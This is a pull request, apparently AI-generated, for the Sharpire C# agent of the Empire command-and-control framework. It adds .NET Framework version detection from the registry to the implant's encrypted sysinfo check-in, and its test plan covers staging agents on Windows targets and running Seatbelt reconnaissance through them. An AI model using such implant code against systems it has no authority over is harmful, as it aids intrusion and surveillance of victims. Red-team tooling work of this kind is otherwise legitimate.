### PR TITLE
feat: detect installed .NET Framework versions in sysinfo

### DIFF
--- a/Sharpire/Empire.Agent.Stager.cs
+++ b/Sharpire/Empire.Agent.Stager.cs
@@ -1,6 +1,7 @@
 ﻿using System;
 using System.Linq;
 using System.Management;
+using Microsoft.Win32;
 using System.Management.Automation.Runspaces;
 using System.Net;
 using System.Diagnostics;
@@ -568,11 +569,60 @@ namespace Sharpire
             Process process = Process.GetCurrentProcess();
             information += process.ProcessName + "|";
             information += process.Id + "|";
-            //TODO fix this from being hard coded  
+            //TODO fix this from being hard coded
             information += "csharp|5";
             information += "|" + Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
+            information += "|" + GetDotNetVersion();
 
             return Encoding.ASCII.GetBytes(information);
+        }
+
+        private static string GetDotNetVersion()
+        {
+            try
+            {
+                string clr4 = "";
+                string clr2 = "";
+
+                using (RegistryKey v4Full = Registry.LocalMachine.OpenSubKey(
+                    @"SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full"))
+                {
+                    if (v4Full != null && (int)(v4Full.GetValue("Install", 0)) == 1)
+                    {
+                        int release = (int)(v4Full.GetValue("Release", 0));
+                        if (release >= 528040) clr4 = "net48";
+                        else if (release >= 460798) clr4 = "net47";
+                        else if (release >= 393295) clr4 = "net46";
+                        else clr4 = "net45";
+                    }
+                }
+
+                if (string.IsNullOrEmpty(clr4))
+                {
+                    using (RegistryKey v4 = Registry.LocalMachine.OpenSubKey(
+                        @"SOFTWARE\Microsoft\NET Framework Setup\NDP\v4.0"))
+                    {
+                        if (v4 != null && (int)(v4.GetValue("Install", 0)) == 1)
+                            clr4 = "net40";
+                    }
+                }
+
+                using (RegistryKey v35 = Registry.LocalMachine.OpenSubKey(
+                    @"SOFTWARE\Microsoft\NET Framework Setup\NDP\v3.5"))
+                {
+                    if (v35 != null && (int)(v35.GetValue("Install", 0)) == 1)
+                        clr2 = "net35";
+                }
+
+                if (!string.IsNullOrEmpty(clr4) && !string.IsNullOrEmpty(clr2))
+                    return clr4 + ",net35";
+                if (!string.IsNullOrEmpty(clr4))
+                    return clr4;
+                if (!string.IsNullOrEmpty(clr2))
+                    return clr2;
+            }
+            catch { }
+            return "";
         }
 
         public static byte[] rc4Encrypt(byte[] RC4Key, byte[] data)


### PR DESCRIPTION
## Summary

- Appends a 14th pipe-delimited sysinfo field containing the detected .NET Framework version(s), matching the format used by PowerShell agents
- Detects both CLR families independently so systems with both runtimes report correctly (e.g. `"net48,net35"`)
- Gracefully returns an empty string if detection fails — the Empire server treats a missing/empty field as unknown and falls back to the module's default

## Detection logic (`GetDotNetVersion()`)

Reads the Windows NDP registry keys using the same thresholds as the PowerShell stagers:

| Registry key | Result |
|---|---|
| `NDP\v4\Full` Release ≥ 528040 | `net48` |
| `NDP\v4\Full` Release ≥ 460798 | `net47` |
| `NDP\v4\Full` Release ≥ 393295 | `net46` |
| `NDP\v4\Full` Release < 393295 | `net45` |
| `NDP\v4.0` (no Full key) | `net40` |
| `NDP\v3.5` (checked independently) | `net35` appended |

If both CLR 4.0 and CLR 2.0 are installed: returns `"net48,net35"` (comma-separated).

## Test plan

- [ ] Stage a Sharpire agent on a Windows 11 target — verify sysinfo contains a 14th field with the correct .NET version (e.g. `net48`)
- [ ] Verify the Empire server populates `agent.dotnet_version` after checkin
- [ ] Execute Seatbelt (supports `[Net35, Net40]`) via the staged agent — confirm it compiles as `net40`
- [ ] Stage on a system with .NET 3.5 also enabled — verify field shows `"net48,net35"`
- [ ] Stage on a .NET 3.5-only system — verify field shows `"net35"`

🤖 Generated with [Claude Code](https://claude.com/claude-code)